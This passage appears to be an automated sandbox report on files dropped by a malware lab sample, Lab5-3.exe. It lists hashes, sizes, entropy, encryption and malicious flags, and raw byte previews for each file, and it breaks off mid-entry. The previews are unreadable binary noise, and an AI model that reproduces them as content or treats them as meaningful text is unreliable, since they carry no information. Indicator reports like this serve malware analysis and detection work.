                                                                                                          MD5:9262385462751D535E2594E8985B4711
                                                                                                          SHA1:2719774770E5E2B23A793904F6C4C8BEE80F3432
                                                                                                          SHA-256:BCA168201CE5515B1EB134F0988FF214ECFAD93B9DDCD0FCB4A7563ABB24E498
                                                                                                          SHA-512:ED9E2978412089770DCE0AB583F7C9C02FB75651FA01DDB7E4D9D52AD78A821409C71A643BA106E586102C635B749CCAD177CCDA83FE5F8FD242D14B7F0B57C0
                                                                                                          Malicious:true
                                                                                                          Preview:q..~.1.:A...T;.>U.a...7.4LL&.%..7P......-.._.*...GU.....%....Z..n..&.^..j.]..z...u./..+?O.8.?8.....H...g.z../"t.......S.p..+%..W...?.y.I......._..;0....].b.w)..~Kz..*..e........#@.*H{k.v.(.;>......1..h.*.Up.-4.......t..-L....Z.'l6..Xt.r_9Z....{..-_s...Ss.)..[...2.s...R(....dC_).C.$......n^.o2.....J....&P...kU......o.+.......L.....*0}.a.s..).ubG....!.^.n.~......{.."3`0~.e.#.D."....l.iV4.+.."...af.\.]n|v..3...V/x.~+.....5m$......:.oE..F ..q.....1..J.s.k.t..HH}c3RD.+x.....>)n.)..k..go..V...j.D.......O.T..f....@.{...e.Yk.5..U".=g.P{=.m...I(........o..A.Mu.kr'"[!..XE...U..'*.b...$B.5K..\..F.......+...........X.Yk....(..*.....:b../.....T+."...+.e.R>.C....|....Hw.C..b...s..._..:rS9.@..6.j.!.8..........?..P........VV../.}.. ./,W..<.>...2..L........2.....VH........j.p....3..{....P.8!..p..Q.....D$Y.B.. ................?.......&".\.!c....C.a...E|A.fsQ.P..{.l......+.v...,nB......%/....,..76g..MM.4..w..<..F..1.d5}k.l.4..E..).<.GB.Pw.....A.!........A.<.R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39520
                                                                                                          Entropy (8bit):7.99507565375109
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:38gs7cQAJvHystxaLsQcjsT8I6ZRvazIPqU/H68vl93lvjI45+tJsj+1XZ:Mgs7kvH/aLseoCs9H6gt0LPBZ
                                                                                                          MD5:D0895D90F6303AFB740EB72DAA527A41
                                                                                                          SHA1:DECE2881F8A4B56CC71E556AA6267BCA940D4F23
                                                                                                          SHA-256:EE88E9BC949979E5E544084F1BB8B1277AE9C27471455022DBD0BC90BF1FBAE6
                                                                                                          SHA-512:FD18BC615136B7280FFD0B0174E2C2A9E260E935BC090B3AC11AE296E3918F5ED980DA8630BAA70A0C3ECFEC7CDCA69C7F69455E5027500CBCFE3451C857A111
                                                                                                          Malicious:true
                                                                                                          Preview:..B..<..-T.%L..=.P......[..M_..IP..'..(..{...L..%.\...Q`....&||.K.K.{z....}FA.....>..d;...".&p.....&.N..$..3.ER..2..,.../d.]..SBN..........'4.d..J{....w#Y...c.as....gU..l.E.+<.....B...i.p...UO.,.....`.9k..!.1.-..wx...r.F....6...W.H..&./.-..T3..=....lP........t.M...d4Df7....w..j......t.x,.p...1l|....."/{....kn=.O..;....?.7.>.mx.,7....69.by...*.g...x}.V...9t.....>R.n.l......t.`....M..?3<..0Q.=.\z.z_L..*8F.A.4.Jn).r:..D*aq..qW..'..X&.(....R.'9....jK.y|..Y.*.D..m....UXazmb."4.5.....#..4d.A563...(...q..f.ye.........fw<.Y.v.....&..c.-N...H...st...W..:.RL..}.I..}...3?.......\e....$..Z.T.....w8..[........9..)?.......,^[.D......b..&.A...If....A..?Y.d|I..e....u@..7.R7.:v..E.*;.sRaE...R..'&..).j..R....K.|.z..|.,.b.t.Ng....Ttkz.....N....[vA1R........d......ss.sR.^.el.u.(G...1..v........G.&.....;i.h.;I.pe^...6.#...i...B..:....*.......y.0.......!...H..k./.U.#.i...w...............#..K....].....M.7-pG.|.~.L...N.x..{.XN...y............A.?.f"1.......$ .m,E
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.897539506315815
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HOSonZVRjHfUTid3hBaUoSGFcmeykEdEElU92i:HOXQGx0uKeY2ElUJ
                                                                                                          MD5:27127D9A4CC80143268D37021ED5D763
                                                                                                          SHA1:5BE0F57D734BAA4FCAF9381C7338D829AE4875E7
                                                                                                          SHA-256:098C2F34716FDA29B9BF904704B439A3D1E166D17CD48F31DD035C380C9D88F9
                                                                                                          SHA-512:E0C34076C93EEA5BA40FF9AB5E0722B72669E2061D78C4BE676E3F352DC9A2E75B367DDD7DB69273C01CCFD910F9A24BD5C14977C9105A98673985C2D91B76C5
                                                                                                          Malicious:false
                                                                                                          Preview:..5*.......mGIQ..xf.....!.)Y@M....0.......'vZW.i....&%...4..N.I..........Q....}....j..{6:.E.X.%.z.O.dy....*.b..`z.RM..?4....7.[}#.c..Rw..0...."...L...m..N.(5....(o..a=_|..L5.p...#.Q.K8v=R.).........FP.H../{.`..D.J.i.@v..l........ FY=0..@<Z..M.F...$..&Y.x...<)."#':...C0.5...m(.}...=.s..u.+..u.]K...X)%."mw.r.l:I.~oY..%.../....._r._..p\*.|....\..s..~Na...8c.*..,......>.U.^*.-..S.........U.yL.y.l...B.#9S......g...#.}y.D.......^].&..<.UM..{]...U..._.l8V...;........r.6 ;..Y......z.Km...r....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14400
                                                                                                          Entropy (8bit):7.9881911444067715
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:M/qp4cGV/WtyhqCSpDH9gOdHBhAh40RnUMb0tb:dp4pWgqCCaOjhwRnRb0Z
                                                                                                          MD5:3A14D5AAA6DA56CD66B853B7EFBAB254
                                                                                                          SHA1:BFD8D5CF025B96202CE317B831D92AB6A63C546D
                                                                                                          SHA-256:A01E3C0974A1167AD1F27822CB43D780924A3AF464F9E19E69694C33A9CBEB83
                                                                                                          SHA-512:51C120E042C0AF6F96BFC02AD07D509F388BDE7466E43362011943E31C6FF1DF846A009FDB4E09BAA9B5E1B285950D533E411308FDAC5764905A72655C70EB35
                                                                                                          Malicious:false
                                                                                                          Preview:..}........L*m..M...dm..h..F..*0.$N.'X.9.a...%..=m]....v..)..h.....j............[.qgqb.2.r....O....t.Z..R;.D.........X...D..edh2........=..K..U.?].C..8....q....A..Os!+Z..d..XH.^. .5l.......e.....!.......Cu.>.-..x........`.8S..)^1rEB.:...$z.Z<.<+...p.dEP.G...q..a,..F.5g.T...(.E.Nj...t.E.xE....I9.W.|..g.E...m._....HH&O!`.Iv.5..b...FM.....U\...)...e-U....<.d..VK.5....x..u..5ck.w....W.M....8.h...,.ZL....;.WC:.{..%.?q............9Y...M.......'d0...k.....O....2)p<.pr......t...n...x[...J.j..u.....H.e........YN.x..C!..Q\.y....o...[.<..~...=?,.).IG.3.....}A..L.V.Y.<...f..4...Yf...6U.e........\g ..N....#@=XG.+pY./..r]E....B......?.6....l..1..9d;m.e.S..2.}..%.d.t..xY$.>.-n....;.2.*...X.?@...W.=~......I...1"FK-........p......zf}j.o=.._......#.c.~|..L).A..&.....). .}....tY.1C....z.;.....0 .>.`..m.;....4;A..$..A...P.T+{[......?.Ij.X.^.....X...4;..cU..+"!f....p3.[...B...C|.~f.?......3.~-w.$..LB....3.7.+.E..t......u}.....hLA..4J.F.vQ....3.1...p+.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24016
                                                                                                          Entropy (8bit):7.992446541467524
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:E3DcIWOKpKKmUBfIGA+zIZWKchbU/iv3+u3Khzo//+gqOfoz1azbM30oRtb:gDcIWHwbGTLjSav+2iK+U6avM5Z
                                                                                                          MD5:E9339C16EFC4BD12665E57C6D979C519
                                                                                                          SHA1:9F45FAF1341C4085BDD8A116C0DF35C311CFBAE1
                                                                                                          SHA-256:780AAE41F8C51D7FAC83B841F6D39838D33E638BBD13EDB3653881BFEFFAB7BC
                                                                                                          SHA-512:CB9A7D7828D9135D8B99A20AC9B6161EB3DCDA4F271942318C747E6E687932B681E1EDD76E2879E6FE0D91382D73811E9F7852EB0744DFC6AF23D369F232AA74
                                                                                                          Malicious:true
                                                                                                          Preview:.....&/,.:..qP/62..*....Q.:.M..]....y...I.. V$-R..v2,..}....*;..JB.......]t.\.n..sr;......Qe.#.<'...7z....d@8.(.......9_..4.3..`).]..GU......b>\...D:.z.7.*ob.=.7.[......W.P...H.).....k?.......?.....R...=H.....!j..(m..?z......'6..l3...DA..T.=Y?_f.`..d...h....;../"0.L.b.PK....z.y......S..P..T..c~=.{.d.$.....-...P.l..J.~4=(R.G.`..U.-...&`..0.-u.j..\.......(..)at..\.8..6.c.5.+.=C4".rm[..S....~hP.<...v.VC|.j.v.i.Op.@.K.a3 .....:....tR.o.m.qZ^.....Rb.$.A.I.g.?R4.m..x.)..'^o K.........u...M+;$......NR.~...........u*..k...[y..`.0q.C....O.:..~u...O5!.].....lt..`..n.?......U&A..qL.....L}.....j......u.1$K.i..`...0......=.}.2..f...rb...z....`G.4.L1I..7....5%.'<o....IC...E[j..=_.Oe.2:..^..`O..d.b.g.X. G.D.oc......3....4...4.*.].<a...(...3.,e..z..5...$...f.R'..N6...BNty8........Tj.C.......Y..Yx...8.!H..@.t...."..G......g..H.......kR.^.....2./'-..|.MW.g.W...L"y....g...W......B.t.[...i;.J .h.V../q..:....~.J.2N...;.24HB..eM.e.p...3..i...1...[......-.;@..n.%o.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.898004356351162
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:/oMOSd30lf2tHfUTid3hBaUoSGFcmeykEdEElU92i:/JyftGx0uKeY2ElUJ
                                                                                                          MD5:6E4BDAAE0DE95DB92DE2338F97584377
                                                                                                          SHA1:2C8BB25C878732C9EF14D8CCE9A25F21C53EB787
                                                                                                          SHA-256:A4124AAEE2C573EE3B25D7EED8B973ADF21935FCA1FF5781A96125F0766B651E
                                                                                                          SHA-512:6E181546F1F4CA0CC92BB1A17E0457C926F746BCBCA86D485C9DE4D8C2A1D7D68C04A1DAF5DC3912851E841D0950DD0FBB6C1592A5FAB9B1720BF7B9198CA9BB
                                                                                                          Malicious:false
                                                                                                          Preview:..{..{d.y.e..]P.....+{0...s..0_h...C<.Qp!.....@./B...D.._...4...t..v.Sb.......lY/lIC..6vX/I..@K.0|.".s.y...^?.>'.x..R..SoO0%...O.'.V...1..3wml.9#0.a.b.E.S.N.#....j.)o.HsN....A.I..l....b.....(..i$>D...JY`..R..BZ65.].w,.>..T...+]/^.sTw...*8i...}..8...-..F..V.....k1...z..)......J...q3@j.......~.n.U..K./.........(J..V.[Zl.lW.z....^WZ...5.....o...2..N'.!K.o.....J|L...Y...........\7.%.nZ..2.x.j.2.Z.CH|/.....`...8....4..:.x4|.......NHI.D..k.......m..+':.d(D..3.0.8 l...E....{..Hg]...<("n~..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):80736
                                                                                                          Entropy (8bit):7.997804984198767
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:N7z+0qd7izZIq36u0pnLFj0IGuv2BUVXJToyKUYN9K0alZ:5z+0qkzJqdLZF8kctUE9KnlZ
                                                                                                          MD5:F341916A2CA4479D20D4B2043618DE19
                                                                                                          SHA1:5BF84766585EF1F995B349DDE6515D3EC18472EC
                                                                                                          SHA-256:3C858A07BB20D5130F093DC8C1E126E4A3B14D1119AE2496C6E556E9A210190E
                                                                                                          SHA-512:404BA9C480BB252E4FB89C12349811B66E6C2BE30D2740E998A0F7E2B7046CE815E12CCE29739417036ACA0699B17C9842B488966FE2AE95F8CC5ED4E763522E
                                                                                                          Malicious:true
                                                                                                          Preview:..p...#.d...J=.sN........!...3p..E..1....P..}x..+s....']....X..3h.........+.\#.Mj..Z....o..i-,n....1.q.....!........as..7..+...R`K...wE.G+".^Yc!G)..a.YM&L....M.*...A.Dq.g......Ea..5....:._..^..W:s.9.....W......[......a.c..V.b??6`.$=.....1N.....E.P..%...s}....H.pg...)/6.s.H.%.d5...J._/..F.....P..*..!..b...q.rc.....u.f-X.r.;..1D...V..!c\9E..Y...D..0/.a.......(...c...t......3......@!..j...u...U.....9wv#..a..u.r.ru..`q..<.....DB..W.m.U.\x._....a].]....s..FG.m^4.*A.p.|..O....2......,4...,..8vG.s.y,._..0AF+.....m...^......\,.q.=.:k..}Yt......r$....}..CKqR.....2....W..}.{ZD.G."3.....&.+l...U5.e...`.B.X.yv;."....}....o..........*:<>..8.F..Po...w......"-n....}.XQ.W_..;.....S.......8d...F..#...a]...%.k..H...<..~E....:..'...c...RBi.F...%/i..&...{......pF..D!=..? . ..y.(..J..O..>,.b....gM...a.~.w...aS~..'....`6.....u.8..\.......F.ZBd.1<l......8...D...vE.|.....xS.;..L.S..{jL..E...}....Y<...JV.S.......`X.._...!..}.If.....xs..j'.Xm.E.....1.....m...>y(..bV
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):280747
                                                                                                          Entropy (8bit):7.999195753636956
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:WdJCPIvG3AUHsLP9ArXeqABpdL6flx22/vvyfl752QLO9DTZ:SGIGtsTyEBaflcQXy9752VB
                                                                                                          MD5:E810A743051012B43043D0CDCD67924C
                                                                                                          SHA1:FBC50C68FBBF47949D6FCFDDCF58AD63786C2094
                                                                                                          SHA-256:A0E1B3793D6D4819773F88E21D971AEDD0C829622D37F121C44DA99F38A9051A
                                                                                                          SHA-512:1A7DECE317FE5971D299E05C5009B66D7FBF4940D2BB652C3FAE41A59A3B9B553C16D9A05F460B210D0EC71B18541CDC41947154635C76FAAE1375250B5888B7
                                                                                                          Malicious:true
                                                                                                          Preview:./..`.....%RGSW.D.@#..Q`......q..;*...[.......v..J.p..].....5,2|..R3...i.......u....zt=.rvWX.>.'.;.3.....=........H.j....L.jq....Xe..+o..r..*...e...s..{....X....cH....VB7.nB....f..(..........ZD.%6|..2........Z.}........B.3M.B.7.."...L..y ..../Q.4.uI...T,..!!._....FKwR...).toTE...F.d}Z....l.-JR.H..3...N...nh.v.YE..dF.....?M h..y.....?S.9....9.dL.86.....2.5!u.....M?..Z].a.-cI....d.I...2qW.H.}.....E..^....SP8.,..k.I.b.k|{....V.....E....9..B".}6&_.@.$v..1...gS...a.W!...8t.A.J...]..A.U.....@.N.....W0L...'...4.Yb.M.y...H/5.<.E.8..0(...) ...`.....QfP.}.o...<'..K.....!.h$...q.5t.\?.c..R..*...%F.gT...x..BR..(.fy...M.h/.(..q....g....C.kk..P!T...F.a..R.AG..G.j.m.b.....'Z.;OI..br..M?..1u.......i?.....P.f.p.....Qxb. &....)....L7XZ...........]Le......wJ....z4NT..P'....s...tF&..F.g.U.3...<)....;.zkv..t..@.mp.....E.)...qt.>8.W..|.$r..ii'>..s...!...E..O...f.~.......D.)kh.}.i=&.N6k...8..J.|9...|.....c.d1.*91...9:D..&.y.<~t8`S...R$I7.~..;h3|.n.{.>.$.i%?...q...X6.$....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):109648
                                                                                                          Entropy (8bit):7.998476061916558
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Y//PouOzeOrjP+YXdeXL9Cc7Gsup3SB182YTfjDaZ:YnPyfmYNeL93GsF1fUjDaZ
                                                                                                          MD5:74BAAB2BDEA8736F75C8CB54B2D75CEF
                                                                                                          SHA1:B38B1E69FD2A2A7D54F4A013B541B521DD9C8A0F
                                                                                                          SHA-256:127333A5DCE33241E65B420F577ECA129E17B066931B3CECD9FEA916D5A72078
                                                                                                          SHA-512:9219F646657D4473FD0D7AC4034127590AB914146EF5B87342A83EF5260900E57C1E4D28C0F3C592B34BB540F8D24BABAD1E8B03A9CA03A808BE96389D644E26
                                                                                                          Malicious:true
                                                                                                          Preview:....P,r......Qux...tl.bx..[..gG*..>...-.o..3..8U..*.....}....tb.7F..}FD%....M....%..(...gm....3...X.kgcz"m.W.....F.....dyB=E.&.u.C..E..ui.....>..p....T..~]..)..........R._0..Dd..i...T....1.(.kl.2%}.1^..{.Q..........Ck.........@.{Y.<.9*.e.R.....7k..5.H<.X....I.;.I..[.#...s....};V.T!....t.X...~&R.._5..Tt...VfDF.#..>5_.;...P....m....:..n.n....uR...z..l....D..\.+.2......0.7%6....~M..=Z..v..r..E....r.....p?+. ...+../ B...'Hh..N....V-....B.d\...1.W.Y.......n..qa.g.....Z..,.......pU. .-E8_.7...n@.`.-....R8...,.q}....?at^|....Zl.<..g.<..9H..4jg.<@25.MGC8F...m.W..I&....Q0n..bzRoH-.<o|~WMw>...B.h...>.....6.......G...Y..5"."..?V;..7..,.K....B.6.mEz.<..i.ruH..4.w.....j>....@|v..a-...c......O..7.8.._....B...~..g....h..d.h.Rug#...l..3~.....F..a..l...D...........@.....M5...*w.1U.)]..Fp~.\..$..]U...48.....Wu..nE.Vi..k.eD...D....<..Z..%...ZR...l...X......)].GQ.....-.....Y0.P.xtm....N...n..|.:.VB..`....E...I.-.d....}.J...\,T.c..\&?.....`.eY..t.M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):106176
                                                                                                          Entropy (8bit):7.998190852745581
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:oW2uk6m+DI7EqDw+6q7t0JSWOtuEvSGvPZ:V2uzI7EqDw+j7k6uSPZ
                                                                                                          MD5:835D45128ED63DD0C46A4F144F1A4120
                                                                                                          SHA1:068BEAD1523A1F15F5B67FA03D8705F2C22CD19C
                                                                                                          SHA-256:034CAE514AD4E0A524B8BD72FB9FA43A33814583D98C528DA0D70A03F8B948DD
                                                                                                          SHA-512:363561F6956348FCCA910704729B3D0DC75D49C4BF9BFBDEDCAA91B0E00915AA596A8933A9762A68F44F55ED4F66E5540E02A3A934810C902FFE07CD769E9F58
                                                                                                          Malicious:true
                                                                                                          Preview:).0O.....u..G..|4...(\.~..<XX...3!I..^.u.....F....c.&.5......bH..3.?i......2<.....).]8..~....U..uk....B..ri}.....c.A}...u*-.P...Bw..Sv...S..J..9*....pO'09.9h....z...0...&...2..k.. ..h..(`.k......=.r&F.1........%.k0....H....w_...R...........E..2q..~4..p..3&4:.%..h...{,.<,..W)r..Y...xi.8m...<..V,....Q..MA.38>...bW...xT..d[.y3.........:7....-..y.G.Q........>...XZf....$-..h_.9...(.6U.ls.#.q.2..S..9.j..k...i....1.-4.<.S.{....p.i..>.N.\n_.x..j@...v.4.A....eB.k..4...M...!......(....G.Am=(.<.....c#s.-.....N.@*.%.m....HTw8..N|{...w.......M...\..2.......a.W. ..@.<...t...{O'.J!].....C....:pi.8.?..a.M.*.....N/_M{.B8~...W......A..8....`..f.@R..8@.dR..(...@...Z.[,.$......Y.e....V.G...J..^*"..a.|;.g.......]...e...(..I..t&p.....Tx........;`........1.BMeG...WOo.aW...c[..].xk...[A...?..P^E..r.*8.T.s.2.>..m...:*..d=.t.L..Fdy..Td....j..Q.o..q..,..d.d.1..ZH.*.....\.+.).).....f%f.&.>.I..p.W..-..*Fe.Uj....=..[.z.?Z.<J./w..........R.3..C..ZyS.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):262208
                                                                                                          Entropy (8bit):7.999304478247789
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:NFaruwZ2BO+iyykXKJL8omGdVIv++AZjGye5soLuJhM9SZhJv9+t+HZ:NFWpZ28CykXso1+fjGfGlhzhJv9+e
                                                                                                          MD5:D9824B3C02F76265581192D760E221DB
                                                                                                          SHA1:E90B34F5767C676C23BFEB0A4CD64A8ACB050AC2
                                                                                                          SHA-256:3FB4ECD085A0EB9FE214628488CE8E8DC39655475885EFD940C12A4CB02371ED
                                                                                                          SHA-512:D58BEA2689EBA31DE9B212E3D9380F2A23BD39B899069055C53D2E401E4ABD9136688D50791EB5123B2C9F126CBCB969E42DBF168EC43D3597F15D33B135EDA8
                                                                                                          Malicious:true
                                                                                                          Preview:..._......D...h..=..w..w@.i=..*DuPx9.H.2..t.......36....F..Yd...9..:.[.mN...\......,..7M......|..}.. ./.....9~].&..k.....gi.:e.#....,.V..47Do....W.......UW\.......|.............d.......^.._.H[e.L...A..IM...m&..3.="y..p!.c`g.zD.S............OK...I6.../Fc.z.S.."$.....FC,".B......c......M..v....@...........w.4=...1.D..........v..=..s...L3...x...[S...v.z....N ..1f....9....L...a.C-.i.x...3<{..x..A...5.{~...........[.....w[2x?.x2.....Wt.~....6..?...0...F..B..?..8;Q.....J.!..!..s#...4B.iim.].%.t/?B..P..G..N..eNO...=`....e\....o.<..2G.d.)!i..W.6.....115K<U...5.$.2..BI.A.w.J..d.&N....2q.4U..(Y9./r=.'..w.{d...8.@9U..C....j*t.x.a.}.8.u.+z4[/D........!..FS.....P3...z....d.4v..O"...Z.P....#..dFU.O.J......i)E..n"...mq..m..y4.P8..saBY...a....^.?y....'Fg.........#..DmFMt*"...68..6....4zRQ..8ag.>...2.}..f2..vj...X@..t|k...."0.J...3U:_....$...#.......I.H...G..1......{...;.o%.$D.@"i..]..(..b.Z$..W..#.-..W.....+.#.E..s.+.0...../..R0..c.K.e.N*.-.D..-..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):243968
                                                                                                          Entropy (8bit):7.9991910169399425
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:xnb86VHCeH4q4cc/ND6PJHkzmp8/vcXZ9XwKtxxx1sIN6Z:pbrNLHLk/N+PNvXgMNe
                                                                                                          MD5:6B7829255798DE692BAFAE2DFEF1FDDB
                                                                                                          SHA1:D53A702E2C83872766B113631C83250715518952
                                                                                                          SHA-256:F5ECCF6D676426D319B7B6B63F58F849B170C6469C487AD574E7E892EF735FC6
                                                                                                          SHA-512:909CDEB3BBD1DF19237998A6300C6B504AD937B3D68CD3878155B120DC5E08770334EBC44A42B99D684CFACA05EF133467D56787A8652833CE335489E7E05BE5
                                                                                                          Malicious:true
                                                                                                          Preview:r.w.L..5C.3.k.Z.......<..L.}v..y. .d...W..v.9_.Q\..5.-.d:5nF.?u.0..df.....,.Vlg*-S$o.......>.c.i......"(...+..W*).FkJ(./.).|>....m.C..7~G.....>t.&Oy...\2D..(M..6&...k>..i~......=.*<.Fg0.^.?...K.D.....:1.M........,(.Uc...]f..P.|#d.{.../v.h.gA......)......N. ."<./!.....z.]..77....^.=.....96...p....s....av-&....`.._Qy...h.X.9.R...k...z.&./E......."B...x.....lv..".n.B....d..$.....=.....A.q..-@E.....;Q.H:.w...X.o..V..FeK..VF%......w<.#....=..@..\I.JLZ.h.q..:...M[. t-...D..R.Mo...q....I....2.++3..Lv..."{+.J...^0..7.hZxl.4+...c(.}. >........eU..Z.pK....K.3....m.g..C4a.$........A...7..H1.a2..y....x..O"..H..h....].../'.@..,F.:.T.8..=.Z..t....D*.....>\G....W....E..m.$...Z....Y.y=.NG......_..l7..].2...G[.|...#.:.!.vCf0.u......W.+.U..a....T.-..uUu...f].-8...B......... ./.r.4.l&..!..^...=.+.:n.@"....E..|..YhC....w..)T...C<...>o..t.g.5.+4<.&y.M.....:.eH.. .hp&......`.H.y].....;......6...1...u..kh.%..>......._E..V}\.|.....c.p.F.1..A4Fo..D......CK.U.}If..c.VbH
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):161440
                                                                                                          Entropy (8bit):7.99882980848574
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:BhEPTrxJv/3cd0OmoGOuDGxYJXC+vddH79wPjmKu/imVYoWvkTf4Z:BhELrDX3cd02G/Sh+1F79waKu/JVYS7s
                                                                                                          MD5:9FDBF85E1D417B428B30186A789C26E0
                                                                                                          SHA1:DEC4DD5798EB6F992DCCFBCC70769CD1630652BD
                                                                                                          SHA-256:D7A7F767D3C4519CFC281825DE5857453BF6BB0563CDB4F45700254FF14F42AE
                                                                                                          SHA-512:86BCD14CA24575523749AE303570CC9EEB4643312437B18722B8631C9BA895D69B6279761638B86218667506DA0F29F4FF0E51B8E4F06755091E0AA28DEA79FF
                                                                                                          Malicious:true
                                                                                                          Preview:..,...<.<..f.&...qY.#.@.....x...K...;s....^.4.....H9+.'7.W.....m.....%......8I..Q..P....W..].....8J......S..5B\.....wU..L.KO..5.7.......j......E.N...h0.@'%...2@..u.....!.\....'..d..}.Hc..{v.p..@....X...;.;.....;. _z/.sB.._ea.c......=r.=Z%(1..".....c7..R...6H..x.=..E_.:...R9...e..W..a.....&=..J>{..o..2..\?nC@.....a1F.....h....g....P...)..T....<*l...L."...$/U...UUZ..>.*.\....o5g'....fA......I.{V.fD..&7...rE.b.E.T.6..~..6?.N.S...q.....:N).<...de.......l..........e..u..Kx.....;..2.[.@....>..R.....X{....i.V........UT..=..`.M.1i/..=*.........;..I..M.6..8......cp.4).k....Xz.g..vD..M.2]..Y8....HH/Z...=x=.[z.'...a.4..)..L.P^....9/.....&,2. .I....5....."f=5R.>/n.x..*..5._.....wdp...F... .r.......g..e3...g..-f.=......t@...3.3j..zF..Fm_4..4.X...a.:,O..5....O...R..l".]...Ve....5\.U?...I#.`u.^y..Veo..s=..a:.....Js../.......<.#Wa..H..Q.2&....$4$.h.9.=............^./...........!.y.}.................p;....<.....#...X.iiJ...i.uz...hm'.o.~.>....9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):281439
                                                                                                          Entropy (8bit):7.999244317113127
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:17VyK0ErCz2NX2ijha+nhtPv3QyC2ive30RjBhLKTTQ7TyZ:R+ErCiAihlvg92iveojiQ2
                                                                                                          MD5:F2C46F424216E3AF6F74A9F256C1559A
                                                                                                          SHA1:CC1B830CA0AF2624DDFE116233FBCE9D801475C2
                                                                                                          SHA-256:A13DC5FB48614AF6456BC2E5ABF5518E079DBDF50CB5C8EA4E0FB57703A2784C
                                                                                                          SHA-512:51743079E5007E756F6E607D82B0EB1AA27691D781E972F689A80176E4458A04B8946520EF6FF1ED7C1C7BC12FC2004ECBE1579C1B3CF1966BF778A6DADF7413
                                                                                                          Malicious:true
                                                                                                          Preview:qj..s.a.....V.n..h...(...JG...1....U.M..q..t..Gx.|......g6...".QJX.*Z...r..f=....1.o..p...S`.;Qjv]...{2....j...c'..h.)..X.%......wq.=M......./..K ..)....I.?3/.a...f.!](..H..t..E...?Un...n..Io..,..sW......-....$"rql.....+AN...C..-.&....QN...Q..b..WQ..x..~.K..a.g#b..#.~..1.*pp.r.E=.[...o.$r..E.2.:.).v].....F.5'...mp.I...<....1/......z..B0t....N.~....K.."..d...T...}3..9........v.E.P.3&CY.i.E.^...<.A.|.;.WTD..t.....:.V.D.}..*.U?z.A..d...t...{x.....U.G!..U......."..&..z7^SP..D....dAX.E.gX3.}u.nb......3yd.h.a?N.KC.Zq:.)...06..Z.:D)......M...Mgw.......a...U5]..eW..H...N.Y."..<.H..n.[...a....6..W.$.jv$`..8..a..J.~.....j...+.x.L.u...N6....._..@.[I.y....}.iH.(|M.|....rD.<i4.......i.'.B$.]..'..S..a,....D..H>..}..2..{i.8f.pTl.0...q...yp......b.f..Y..e.e.....#I%..S_.l=5..1......ZFMr....*....ap....O.y...R.....BTp...F..N=<.+.d.|..)b.Oa-.....E$..>.-N?..\k...J.....J4...}..U\.W..5.tD....b.z..L.......G..\.`.?c.....E....(...1.~....f......l.n.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):379852
                                                                                                          Entropy (8bit):7.952095782552412
                                                                                                          Encrypted:false
